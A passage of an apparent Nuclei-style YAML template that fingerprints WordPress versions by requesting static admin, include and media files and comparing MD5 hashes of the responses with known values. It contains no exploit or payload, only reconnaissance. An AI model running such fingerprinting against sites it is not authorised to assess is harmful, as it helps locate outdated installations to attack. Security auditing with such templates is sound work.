- dsl: - - "(\"165ba7d3a093473cf47a6b0fbd141dbb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/icons32-vs.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"052cd6502a05e7d3f17b3e76a5b15566\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"d5a8c1950e1a20172151f463c8d9d489\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"a9a5cf708efb664e3bc3f216daec12ec\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"091cecbcaf2277683ad3c3a06d6d33dc\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"74426dbce10c55709c4877554d455c4e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-button.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"b2b6c3e336054070e8927a5e7965f3ce\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"970192c8af45d58e092c4e20f60ca059\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/no.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"c86bbf1c64c924f99fdc9f5637f0c08b\" == md5(body))" - - type: dsl - name: 2.6 - 3.4.2 - dsl: - - "(\"f787d0b0069027fc7b571dbbdabaa3c5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/post-formats-vs.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"a68f53a66c93f4485ca9acafaffc81e6\" == md5(body))" - - type: dsl - name: 3.6 - 4.0.32 - dsl: - - "(\"24726acea48e9bffc1744638f2d1f666\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/menu-vs.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"719980f24cf02c0c5fa53b312fef45ac\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"73affbee3e5e3aec19199a657b4f88f7\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"016631a0b568350ef294f7aa9f44e0af\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"20243e9888a8e85e47320f5e10ec663d\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"8bef8c397f737a91ff8c4a2edbc16b36\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/list-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"68d5bb134953c23217fdd36982679a0c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/mask.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"fcf693677ea822e6d24af7b2e4a98e99\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"c6dc921c0d6f2197793d9174b4267ca0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wordpress-logo-white.svg" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"19bdd97150fb43aa862d53500c44e6f7\" == md5(body))" - - type: dsl - name: 3.8 - 4.4.24 - dsl: - - "(\"e1af633d59dcb5988cacff73b6dee9ff\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/post-formats.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"dc4bffe1d10093e4d92533a8d60cba07\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"cf8cdb0bc623dee2e18898b44b11744c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wheel.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"4530bd2071306dbbc61a592556b958a0\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"18568b368b3c5dfe7b67017a1ac3d329\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"2b6d304868ff398c17252b7b0a0414c4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-editor-rtl.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"143da4e979fd86e002fba6cda338cf7c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"1cc17a3f6fab84d7f5cdafb9a1e48f09\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"90d7daa9fa832b6ee628d44bac2914ed\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"d4c4155fff66945ef367f81b9f007f23\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"681c587be87f8084fd15ce13b1460c8f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b5eafb27263420dc587154987eefd9dc\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"af4e88597b7bafef229d9cfd7f78a7f0\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"9dad58e09b0522a67f359c9d85cd15a1\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"51a6eccc0e58e41141b938c556e2b622\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"c6dcd57eb62b059f20223ca862046a02\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"9407340fa00808af6c733322ccbe9a9e\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"01ae9946e7a7a08c32f1261d031c0320\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"fa029d751a7e76496019bd3a5a69f039\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"69d21af7f06b1347a33b42916e7b08d2\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"11cf82a7b3767ab36772ea1ac7dd2014\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"7e44b4a4422dc8db4efe76a8be193cb5\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"76d03147582cd99d51475f6bd651423d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"48180a7b52dd60bec1fc7a0ae2be0826\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-editor-rtl.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"464da848980476cd37de1c0d7964c1e4\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"9c1467e35e805d97da87d6df5b80f9c2\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"8de2501460648d4cb12d23774d21dd5f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-editor.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"2cf3344cb737ec622532596ac21cb85f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"2c096e4ab4c7c797f2f2017ac1fb7d20\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/l10n.css" - matchers: - - type: dsl - name: 4.6 - 5.6 - dsl: - - "(\"b5c4b8f85029fb7c84f0719f72b280ad\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"a611aee8ff502b5e2e28ea7ad2a4c211\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"4cd680a0941c3452ba43a54fca56a406\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"5dda0b5411fecbe1fac83dfe21c7540e\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"53825e0f13ec9497ea097b6d9d9ebf77\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"41ad7b492a52ebf1cc72d7d4f2f6dd2d\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ceae11d0b544effd0143146a689b60ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/farbtastic.css" - matchers: - - type: dsl - name: 3.8 - 5.6 - dsl: - - "(\"f9e33829b8faed7d7bbef843fb683255\" == md5(body))" - - type: dsl - name: 3.4 - 3.7.35 - dsl: - - "(\"90e8ee437da5a2fa7bd428a67182a198\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"b3e8340e402157e34c51510c2f192641\" == md5(body))" - - type: dsl - name: 2.7 - 3.2.1 - dsl: - - "(\"b45e420bae504bad3ad026f11fb34414\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-editor.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"b01941463721a9e3d36d4b4dc3781c66\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"d423a8f9152d19050b6020d0599e550b\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"953fa7568d1de29bc722de0c8d27c59d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/light/colors.scss" - matchers: - - type: dsl - name: 4.3 - 5.6 - dsl: - - "(\"480b9bd647e5b323ef88d63ce55e1d6f\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"20a8567ba70294295c115f7ed9e071b7\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"d4534373ceb86fd1e1582d00de26bd81\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/blue/colors.scss" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"d9d03549d79484672c29145aad594db3\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"6220096c2fcaa516839e89b40744e911\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.scss" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"5692871a8a7a1914ee0968ddf9923dec\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"11d1a9a671ccf4371372cc033a38e2d2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.scss" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"940171d1392bd8071122a905d12b9195\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"d09b41f68ac7247d47e79eaa6fb0e92c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.scss" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"26dc8daaf0c47c4457b8bc2145f48634\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"0d287edc7631906fabaaeec46f540111\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/bookmarklet.min.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"a91cd95baeb66d4873dbe424b75970c3\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"b220cfa4b7eddb2b7340bf022cd4b41c\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"b7ee968190e961f9aefeddac25543c45\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"07603898b017e6cc23f7a5b90c003314\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/farbtastic.js" - matchers: - - type: dsl - name: 3.1 - 5.6 - dsl: - - "(\"a73af354a03241715d8698feea340b92\" == md5(body))" - - type: dsl - name: 2.7 - 3.0.6 - dsl: - - "(\"ba2afcd06915d8d312f7140c464938c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/bookmarklet.js" - matchers: - - type: dsl - name: 4.3 - 4.8.15 - dsl: - - "(\"95c9ef35b76af2aceaf9d6c5958e8d43\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"599601c1e1bcbf766f466722e50cb06b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/press-this.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"ceec025d4710581c8a0986860c8dfac9\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"18c78fc40d75f973159700ac6bbdd83a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"5491b59c4e2758920d933adf8661b068\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"682e5b74d3791a9c09b8c5317f84aa4a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/press-this.js" - matchers: - - type: dsl - name: 4.4 - 4.8.15 - dsl: - - "(\"f248f30a8a7d782d4e38962c8f0e6329\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"bac097de798345d068fd863c96b9ff41\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"91993a940f719edbe2ad8a259973527e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.js" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"9b4c722c56b2a7fa041c7a50f7019801\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"a881348ad82cd67fd3ede2686f8e9cfd\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5 - dsl: - - "(\"85199c05db63fcb5880de4af8be7b571\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"bedd695932ccf2f6c1d21471bf2e9228\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"dda0aa24705a5218d13e271c8c187cf7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-embed-template-ie.min.css" - matchers: - - type: dsl - name: 4.4 - 4.8.15 - dsl: - - "(\"1aec3cac7756e9b405bcbf0ad39c7772\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"377b5750db4cf37b4897d918a90749e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/handlers.min.js" - matchers: - - type: dsl - name: 3.5.2 - 4.8.15 - dsl: - - "(\"96592c6b3fad580ce04e12bc3047ef3b\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.1 - dsl: - - "(\"44b4f7cfec54b7fc8410a383257af538\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"6a8fbcda994be17e7109f588fcd8633d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/swfupload.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"6cd370bfd4d86c44ac155fd913e971ac\" == md5(body))" - - type: dsl - name: 4.0 - 4.6.20 - dsl: - - "(\"ef3ae9014525cf81187afaa61bca737e\" == md5(body))" - - type: dsl - name: 2.8 - 3.9.33 - dsl: - - "(\"603bd14299f61a7329b2d353b2b56c2f\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"79ada21b0ad56e6497057db7407c2480\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"2408a38cb26fd712e8cabee4da573075\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"ccd72399988bf939dce13e2659526711\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.form.js" - matchers: - - type: dsl - name: 3.7 - 4.8.15 - dsl: - - "(\"e5afd8e41d2ec22c19932b068cd90a71\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"1210dad363fcd0a43dc28244b69369f9\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"5b000ac69e0bc5325856cfe2ce588b88\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"958cc914d5beeebe517f7a1da5360ad5\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"2ff1a749aeaa2a874b8bd53960e982cc\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"820f80306571dbe0a1deb0b63496d85f\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"2bd31999f24a62d12a568fdbb8d43759\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"d08a6e3d69ffe1088166ae1983e2355d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/utils/mctabs.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"0c3884be4fe9a43048f9c62d59dcda7f\" == md5(body))" - - type: dsl - name: 4.3 - 4.7.19 - dsl: - - "(\"b9b50ddbe07c754a6b656b0fdada3500\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"9f78248e9e0a64aa17f3062ce25099cb\" == md5(body))" - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"bd062418b6a7e5007649421815021565\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"80ef3cbbdea4cdb927d0b818fc936056\" == md5(body))" - - type: dsl - name: 2.6 - 3.0.6 - dsl: - - "(\"7727d6ef7c831c363ebfe40fc3f4e144\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"2a1823e4190de5b31bbfd48e51597448\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"84ef3a193d26119e8109afaae7a1c5e1\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"dfb2a3ae3f1f7d08232d64102bf6bf38\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"12a27164435afd5df1bbbb7eb3a15a01\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"eb81a1ec2259f9b1b4933e7855e5ada3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/farbtastic.min.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"30996981c129bd331b5cdbb88a2fa23b\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"23d55eb53a88478028930c82b13a6b0a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-icon.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"66a5336284db6dc9874764fa8548a471\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"1eb6581bc8d6bd4fc9c5b5d5a3f678df\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"6c951fcb811b78da4a91c55447888f98\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-icon.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"02f37c95552dc7cda5e2ca3c4ef6ac20\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"51ef2e5d648fb9b7bb4c2b88cfd25519\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"17ca77d176cb8d49591f32eab4c55d00\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"8d0ea8f47d8c45b2a80211d470306c75\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/farbtastic-rtl.min.css" - matchers: - - type: dsl - name: 3.8 - 4.8.15 - dsl: - - "(\"1a884c09637a47af300c7e6c3057ddc2\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"d55340e3ce5b935c2cf0337c92b61521\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-icon-rtl.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"52189e8f1862001b7bd1f5f0ed71d30a\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b7bfe7d9aefb4e687d1e62eb70d658ac\" == md5(body))" - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"c5605f3fde843ddb7cf887a72b9464a8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/dailymotion.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"56dc9e4ca869b97225bcfc67152d234a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/soundcloud.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"8105bbb490f03094ec848fd4aaa986cc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/facebook.min.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"7606b8a8ade2350f2dbff7e6ce992b1f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/twitch.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"a5185612b657eb6423add5755cb8a2bb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/twitch.min.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"90a049a82b0cc9a3c76755988df52e09\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/dailymotion.min.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"e01f0763e423742e0e0afeae2e685260\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/soundcloud.min.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"559517962c6329e56bd38132ee7322c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/facebook.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"4fdb5c45851d105d37bb178126f4a59c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video.swf" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"88aeb3b7a5f3961393ffe6eb649a3a48\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-migrate.js" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"3cb6030743925f687ad3043384ed3c37\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mejs-controls.svg" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"f0849a5e79712b10e1531925e3edb879\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video-hls.swf" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"b2dc69c327348b4774bcefb6f8aa0408\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-video-mdash.swf" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"dc64796b1bb9f9a40f5f2f874e821266\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-audio.swf" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"b56f0ff117c8eb507f1df12dc88663c2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-flash-audio-ogg.swf" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"c8890c74d2c904afd97022d20072f2b9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mejs-controls.png" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"872edbb75a23651c30bf3ca06c9690bf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ko.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"96157f9a2d582a9b2f9d2d9036b91b69\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/pt.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"a9088bc020ad452490c511935e0b7d2b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ru.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"12a4ed71d1eafbc02fae603e56c1892b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ro.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"d6326bd53b37582446b9789c30220193\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ca.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"27eaf272c68d547118ee6210c844bda6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/uk.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"ab2374f9cf8189d04fe13da19ebfa70e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/zh.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"cc7e0a8399c10d2a5df12c5d00154dec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/ja.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"4b8f8f808a309dde6b7e9aef47b82a1f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/sv.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"13e15568b725b19b00469af61d239bc2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/es.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"bf5210c36107656b88bc010cf5c0a8a0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/nl.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"e2b8cba3dfcaf15dd32a28f52189ceba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/hr.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"862f150e2db5c2ef846a7a3296a67afd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/sk.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"b78e3fe643f1b04fd6b29cd76364ca89\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/hu.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"76ae0adf33f34cb9463e93b9e9e3069d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/zh-cn.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"5849066af233ae91cfc34700bb02d1b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/cs.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"cb39cbf670a82d0e52d40a9115c50149\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/fa.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"a738d9563af8c9f240c770422abab6d8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/it.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"fd9c90d0291ab3a774d39556b7646c68\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/pl.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"94c0b3258c5a3b0241789c01321fd292\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/fr.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"cb69c7b0e31b37817f75bcaf446ec91a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/lang/de.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"eb110dabd02486e1f838b4b317f18487\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/moxie.js" - matchers: - - type: dsl - name: 4.9 - 5.6 - dsl: - - "(\"8923430da19a35c7b1efc792b681fc9a\" == md5(body))" - - method: GET - path: - - 